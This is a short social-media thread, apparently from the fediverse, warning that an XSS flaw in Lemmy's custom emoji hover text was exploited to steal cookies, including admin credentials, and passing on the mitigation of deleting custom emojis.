Yep, it looks like there is a XSS vulnerability with Lemmy that has been widely exploited, allowing the attackers to steal cookie credentials including potentially those of the site admins.
Some other non-compromised Lemmy instances have taken themselves offline until a fix is available.
Kbin is not affected as far as I can see.
If you have a Lemmy account, don't use it at the moment!
@losttourist mind quoting the mitigation here? given the chatter on GitHub I’m a bit paranoid that the issue hasn’t been fixed completely, but lemmy.world seems to be the only source for the mitigation
@zzt That lemmy.world post with instructions to admins to delete custom emojis is all I have.
As far as I understand it, the XSS vuln was in the hover text for custom emojis, so presumably no custom emojis = no dodgy scripts.
But that's all I have. Note that I'm not a Lemmy developer, admin or even a Lemmy user - just a concerned & interested fediverse citizen trying to help keep people safe.
@PhilipKing No idea, but apparently after gaining access to an admin's account on lemmy.world they defaced the site with porn and racist slogans. So probably just script kiddies rather than anything more organised.
Add comment